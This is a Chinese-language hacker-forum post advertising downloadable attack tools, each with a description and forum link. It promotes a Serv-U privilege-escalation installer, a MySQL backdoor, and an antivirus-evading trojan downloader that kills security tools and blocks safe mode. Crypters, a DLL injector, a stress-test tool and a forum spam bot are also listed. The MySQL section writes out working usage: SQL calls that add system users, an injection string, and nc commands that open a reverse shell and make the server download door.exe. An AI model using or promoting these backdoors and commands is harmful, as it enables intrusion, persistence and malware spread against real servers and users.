(分享)黑客精品软件

1.HWay && Serv-U

软件大小: 185 kb
软件说明:

利用Serv-U的本地权限提升漏洞自动安装Hway!即使服务器的Serv-U密码被更改,只要ServUAdmin.exe可读,它便能读出更改后的密码.此外HWay && Serv-U.php还具有本地端口扫描的功能.

如果服务器的Serv-U的端口,密码都没有更改,那么直接点击”安装Hway”便可安装成功.否则请点击"获取Serv-U的管理员密码和端口"尝试获取更改后Serv-U的管理员密码和端口.

程序截图:


论坛下载连接: http://www.286hacktools.cn/read.php?tid=1843

点击进入下载页面

2.Mysql BackDoor

软件大小: 177 KB
软件说明:

Mysql BackDoor是一款针对PHP+Mysql服务器开发的后门,后门安装后为Mysql增加一个可以执行系统命令的"state"函数,并且随Mysql进程启动一个基于Dll的嗅探型后门,从而巧妙地实现了无端口,无进程,无服务的穿墙木马.程序在WINXP、WIN2003+MYSQL5.0.X下通过.

[安装]
将Mysql.php传到PHP服务器上,依填上相应的Host、User、Password、DB后，点击"自动安装Mysql BackDoor"



安装成功后,Mysql上便会增加一个"state"函数,同时利用Mysql进程运行一个基于嗅探的后门. 这个后门在Windows下拥有与Mysql一样的系统权限.

[使用state函数]
State函数实际是一个和PHP的”system()”功能相同的函数,可以用来执行系统命令.在”请输入SQL命令：”处填写要执行的mysql语句,如” select state("net user nohack /add")”,点击”执行SQL语句”后,便会得到运行结果.



[使用基于Sniff的后门]
有了state函数,即使WebShell丢了,只要服务器上有SQL注入点,我们就能通过注入".php?id=1 and state('net user')"的方法在服务器上执行命令.但是如果注入点都没有了呢?我们仍然调用基于Sniff的后门控制服务器.向服务器开放的任意端口发送以"Mysql-"开头的数据包,便能调用这个Sniff的后门,如:

1.运行系统命令: nc ip 80->回车->Mysql-cmd /c net user abc /add>c:/log.txt! (注意:最后的"!"不可省略)
2.让服务器反弹Shell到本机20082端口:先运行nc –lp 20082监听本机的20082端口,再nc ip 80->回车->Mysql-c-->回车
3.让服务器下载文件:nc ip 80->回车->Mysql-http://www.x.com/door.exe -c mydoor.exe! (注意:最后的"!"不可省略)

    除了发送"Mysql-c-”,其他的命令是没有回显的,但相应的命令已经在服务器上运行了.


[卸载]
在Mysql上运行"drop function state"便可卸载,但同时会造成mysql进程退出,重启后恢复正常。

程序截图:




论坛下载连接: http://www.286hacktools.cn/read.php?tid=1815

点击进入下载页面

3.wingscrypter 1.0

软件大小: 166 KB
软件说明:

布过2.0的  这是1.0的

程序截图:


论坛下载连接: http://www.286hacktools.cn/read.php?tid=1845

点击进入下载页面

4.暴风网络压力测试2(非外面的版本)

软件大小: 605 Kb
软件说明:

2.o
修复了 几个小BUG增加了 文件监控

程序截图:


论坛下载连接: http://www.286hacktools.cn/read.php?tid=1816

点击进入下载页面

5.小耗子下载者0731
软件大小: 1196 Kb
软件说明:

软件名称：小耗子免杀穿墙感染过主动下载者 2.3

版本更新：08.07.31更新

免杀过 卡吧 瑞星 金山 等主流软件

软件功能及特性：

1：软件去掉了暴露的U盘感染功能，使免杀更长久。
2.具有反查杀功能，可关闭 冰刃(IceSword) 等主流专杀和反查杀工具。
3.通过，卡巴斯基和一些主流杀软的主动防御。
4.还可定时读取TXT功能下载并运行。
5自身为系统文件，隐藏不易被发现。
6.屏蔽系统“安全模式”，自动关闭：“杀毒”，“病毒”，等关键字的窗口和网页，更好的保护自己。
7.屏蔽了大量的国内外知名杀软和防火墙，重启计算机后生效，可使用本程序运行更为流畅。
8.屏蔽大量感染下载者 等恶意程序，可使用本程序运行更为流畅。
9.TXT定时下载完成后，立即清除缓存中的下载连接地址，更好的保护服务器下载地址隐蔽性。
10.无限下载项，txt方式下载随时更换连接.

TXT读取使用方法：将txt上传到生成器上所填对应的地址，在txt文件中的第一行，写入要下载程序的地址。
格式："http://www.xxx.com/xxx.exe"
第2行写程序下载后本机保存文件名
格式: "Test.exe"　　
如有多项按此循环.支持无限项，将写好的txt 文件上传到你的空间，
然后在程序配置处写上他的网址点击配置即可。

(不包括二边的双引号，顶格写，前面不能有空格)

本程序已屏蔽大量杀软，如果首次下载不成功，请重启
电脑即可继续下载成功!

完整配置txt格式示范
http://www.baidu.com/mh.exe
mh.exe
http://www.baidu.com/zt.exe
zt.exe
http://www.baidu.com/wow.exe
wow.exe

统计地址
将申请到的统计代码放入网页内,统计申请可以去51拉站长都可以

注意：测试请使用虚拟机测试，如果你本机测试有任何损失本人不承担任何责任。


如发现后门请举报!!!!

程序截图:



论坛下载连接: http://www.286hacktools.cn/read.php?tid=1853

点击进入下载页面

6.PHPwind论坛灌水机
软件大小: 16 KB
软件说明:

1.此软件运行前.务必确认你的电脑已经安装了啊.NetFrame. 2.0,因为此软件是在.net平台上开发的.

2.在phpwindv6.3.2.测试没出现问题!不知道别的phpwind是否可本人行!以后陆续加上.应该可以的.嘿嘿

3.注意,文本框中的地址是你想回复帖子的地址,务必确认正确!!你帐号和密码登录成功后.就可以回帖了啊..

4.为防止商业用途,此版本暂不提供回复内容修改的权限.


程序截图:


论坛下载连接: http://www.286hacktools.cn/read.php?tid=1848

点击进入下载页面

7.Dll注入辅助工具 1.0 VC源码  
软件大小: 32 KB
软件说明:

软件作者：寂寞宝贝

点Open选择一个你要注入的DLL，Remote Name那写你要注入的进程名，列如 notepad.exe 不需要写进程的PID，如果你选择了后面的那个Possession Process选择框，那么进程列表内所有的notepad.exe都会被插入这个DLL，相当于批量插入功能！

程序截图:



论坛下载连接: http://www.286hacktools.cn/read.php?tid=1878

点击进入下载页面

8.Open Source Code Crypter

软件大小: 120 KB
软件说明:

国外免杀软件,Delphi源代码

程序截图:



论坛下载连接: http://www.286hacktools.cn/read.php?tid=1846

点击进入下载页面